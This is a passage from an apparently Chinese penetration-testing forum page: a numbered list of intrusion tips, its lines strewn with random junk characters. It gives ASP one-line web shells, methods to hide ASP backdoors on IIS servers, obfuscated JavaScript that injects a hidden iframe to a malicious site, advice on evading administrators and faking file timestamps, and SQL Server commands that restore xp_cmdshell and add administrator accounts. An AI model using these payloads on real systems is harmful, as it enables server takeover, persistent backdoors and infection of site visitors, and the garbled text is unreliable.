d).<script language=VBScript runat=server>execute request("sb")</Script>7 B$ x: b0 @+ y7 u0 u/ @9 H. P
e).<%25Execute(request("l"))%25>
3 J* W6 G) P/ K0 Y, ?f).<%if request("cmd")<>"" then execute request("pass")%>. p9 }) q2 U, R% M* G

$ C* g. I( p6 o! h$ Z52、at "12:17" /interactive cmd2 z3 A! d6 j3 @6 m3 ^$ V
执行后可以用AT命令查看新加的任务" S: n. a: I" {, y+ s
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。, C4 W; m+ W1 S/ `' r

7 w: u+ f& B( }" W53、隐藏ASP后门的两种方法
2 w" m9 M; i/ N; {2 X! u8 ?& y, k/ V8 {1、建立非标准目录:mkdir images..\
0 _. b6 q) P' H; S拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
6 \6 y* A5 D3 ]6 T6 o" ~+ a) l通过web访问ASP木马:http://ip/images../news.asp?action=login
" O4 d: l1 ?+ ?- B  X5 t* K如何删除非标准目录:rmdir images..\ /s
3 a( B4 |- x. g! c2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
5 W- c  A& w) z9 W$ T) pmkdir programme.asp
, k: [' P$ Z. Q& G# ^新建1.txt文件内容:<!--#include file=”12.jpg”-->; s" E9 V3 O1 x8 e2 K: l: C
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
2 x% f1 d8 k- xattrib +H +S programme.asp
* y" p1 O" [, G+ U- E2 L通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
' c$ s1 Z& z; t7 s
; B! \6 M0 u8 ?4 X" A- u54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
4 U5 o8 }# e7 s: I- b# r( i然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。- W; v  `+ A3 z- y+ o

0 U3 O  h) F) Z5 _* B9 J* W55、JS隐蔽挂马
7 a9 N' [  ?2 T1 B9 H7 V$ s5 V/ f- j- N1.3 U- J5 t$ y/ [0 r
var tr4c3="<iframe src=ht";) u+ d8 N5 I, X0 j0 e
tr4c3 = tr4c3+"tp:/";
% d( ^0 ?, T2 q3 r0 K7 x4 B2 Atr4c3 = tr4c3+"/ww";. ?! R8 |' r4 c' T
tr4c3 = tr4c3+"w.tr4";/ o6 D. b) c. [6 V7 Y0 A, E
tr4c3 = tr4c3+"c3.com/inc/m";
; ]& O# V! ]$ dtr4c3 = tr4c3+"m.htm style="display:none"></i";
# K9 ]& Z6 u  z. @tr4c3 =tr4c3+"frame>'";
7 ]+ D1 q/ C6 s) a! Qdocument.write(tr4c3);
" I( m7 V% b4 p9 ?2 e3 P9 [/ N避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。' C+ l5 I% {& _7 u1 F

& S; Y; S; o! M5 E# t: ]& s2.
: W* V4 \7 N% I) W) f转换进制,然后用EVAL执行。如
& o+ E& H) e2 n% o' Q5 E8 X8 ceval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");/ e6 ]; j+ z3 [# e0 u7 L# K! B9 C
不过这个有点显眼。5 ~" r) Z1 T) F4 ^2 G+ L3 a1 i
3.2 Y& j) ]" C% C8 p( h$ K
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');  e* H# ~& v; q* N$ e" Y
最后一点,别忘了把文件的时间也修改下。
* T( z- p5 s! l+ g' [' A% z2 l# i$ N8 [9 ~2 F7 _2 s
56.3389终端入侵常用DOS命令
. p' {6 t+ z( o. ]: f( a+ [  Ftaskkill taskkill /PID 1248 /t
- X% l/ P2 Z' [, \1 V" @
  r+ b% b2 o" m3 ktasklist 查进程! X4 L: P+ v5 G! o6 D3 a
: A. x( L0 G2 K7 B. u# K0 M
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限: {9 u: M/ e) X( c2 ^1 [6 {
iisreset /reboot6 K4 F  \/ Z. r8 J$ z- W" R$ `
tsshutdn /reboot /delay:1    重起服务器
7 U* ^. W, q$ {3 F1 c8 z2 n" D2 |( E  o) Z. r3 m. J1 p# v/ _% s
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
6 Z- D7 ~1 F  s% {3 I+ b# f
& O2 V+ n0 X8 c2 w) w' a- gquery user 查看当前终端用户在线情况
- v6 v+ ~6 y/ H. R  `9 E9 p4 a! ^7 l; m
要显示有关所有会话使用的进程的信息,请键入:query process *
  s# \! L# Q  G+ [$ ?6 B3 w
: C. l9 ?1 s% P% l( O( R要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2* L6 U9 A8 d$ Y- t) m% N2 `+ h  I8 a

9 S' Y- v3 Q2 i$ R要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
9 x# T; B! ^" W; J9 K# m
! v; r5 C! C# J: T8 ?% {要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02% x7 Q  [* H0 L0 c3 K6 `

7 ]1 J) b( d7 y; s8 ~8 V6 g命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启4 s- K4 Y+ J1 ?2 N( g. |

  F4 b5 V7 i9 }6 A* w命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统9 \: n4 W( R6 W9 H
- l! d7 D7 V7 R: W
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。; T  h* d( f9 X& U5 O3 d- L) Q" p
8 ^# p! K5 l! V" i9 {) h  Y4 F
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
$ a$ J6 A$ z6 n5 O, U" `* L  _/ _% k0 m
56、在地址栏或按Ctrl+O,输入:
8 X/ y& M& i/ {8 C0 F7 Njavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;$ s' P2 q4 X9 Z* p: |5 k, {
0 i8 |+ j( k/ B9 ?
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。* ~  c& L: Z- }

- M* b) l8 F# F* ]( u1 N2 @57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
' L  U$ A. H+ u/ ^, D用net localgroup administrators是可以看到管理组下,加了$的用户的。
: s$ N) v. N& x4 [# g8 H4 a' b6 e7 m% @, I7 q
58、 sa弱口令相关命令
+ L- o4 c( J7 C
' _, [5 I; ]  p一.更改sa口令方法:4 g  d% S2 W. f9 d7 k6 k
用sql综合利用工具连接后,执行命令:1 T/ G( f; h" G; r7 a7 r
exec sp_password NULL,'20001001','sa'
9 _$ Z  z& U" L! |/ e4 K(提示:慎用!)
) F4 c) c1 t( ^) L0 l  U5 }( o( u3 V) K
二.简单修补sa弱口令.
* B+ Z! L& q" B1 D
5 X  ~: ^# y$ v- M4 N方法1:查询分离器连接后执行:
5 R0 Y' Z0 w* t) C. m9 tif exists (select * from
4 u0 K( s  N1 D4 sdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and2 |( u4 i  e$ }6 t/ f/ z2 `
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)# }* `* q7 h- F0 _- Q
- L0 G. ~, H1 g
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'" n8 c! C" [( H2 l* K5 F- y6 v' R

6 ^9 b+ R$ f3 X) J+ c% P. z$ MGO
: ?( ?1 j2 P( V  }" W5 p1 q2 ?3 P" k3 a: h4 y3 {2 a$ g5 ?2 d
然后按F5键命令执行完毕$ a% x( Q% ]. I* }
2 u$ r1 B# h: C) L! Q- X
方法2:查询分离器连接后
" n1 X, \% P6 X! ]$ G第一步执行:use master
- t; w, u  }; F" \/ Y' S# y0 A; i第二步执行:sp_dropextendedproc 'xp_cmdshell'
3 L( y$ L  r7 O" B然后按F5键命令执行完毕
( K; v1 I* f: Z. P0 o) ]( W0 T% ^5 T! y* k
% Y" ^0 H* u- C7 N
三.常见情况恢复执行xp_cmdshell.6 Q) h8 |6 V8 V4 r7 ]$ S

/ V+ i2 b( A  M2 D; r6 j; T6 Z9 A
, A+ l  N3 M, e; z- G# A1 未能找到存储过程'master..xpcmdshell'.
5 w, e8 u% y6 @4 c+ m   恢复方法:查询分离器连接后,
8 _1 ?: R" D' C+ `: P6 ?第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int; ^' m7 N* b0 R/ }  a
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 ?: R# g5 K2 j+ I- L2 M然后按F5键命令执行完毕
: X) ?: C8 i1 \
/ ?+ i2 Q4 N" h% l2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
& Y, G. B  n3 o% w$ O恢复方法:查询分离器连接后,; N1 c3 h+ {0 [7 q8 r" \! {
第一步执行:sp_dropextendedproc "xp_cmdshell"; K- P4 u6 y$ O' a" E4 ?
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! S7 x+ s6 n1 @. x
然后按F5键命令执行完毕
3 o! W) x  i( O9 n# b8 Z% J8 R: Q6 `6 g' x5 S6 O
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
6 R! q  ^1 \, _6 P& X5 }恢复方法:查询分离器连接后,. h+ k3 a+ M1 {
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
% s: b7 ^4 e( n5 c# s; C( [第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           , L6 G! A% @) w4 ]7 h
然后按F5键命令执行完毕  p" a0 l; R& c6 Y( U. M. J
0 l2 M3 L/ a6 G, m- S+ N% Q$ |) \
四.终极方法.
" D8 {3 C+ Z* B: h如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:- I/ r+ }6 K) K( n" {' l+ I
查询分离器连接后,% T1 i/ N3 R8 H! q
2000servser系统:0 H. H  v, U4 P, U  Y  {# \# d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'0 Y4 m. \5 J/ l+ z0 r7 M

$ n' ^& e* a3 f7 {8 E& Y$ t$ z% T7 ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 }! @( v2 c7 f/ T( W! D

3 c7 U7 E; B" jxp或2003server系统:
+ V: {* v4 S7 R3 L" q) j2 H! K1 c% }: d3 e/ C, p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'9 W% ?/ d% _; f7 w; m1 c. v) ~
: N: j) ^+ _' _1 [; z, ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'2 V, Y" O; k- d





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2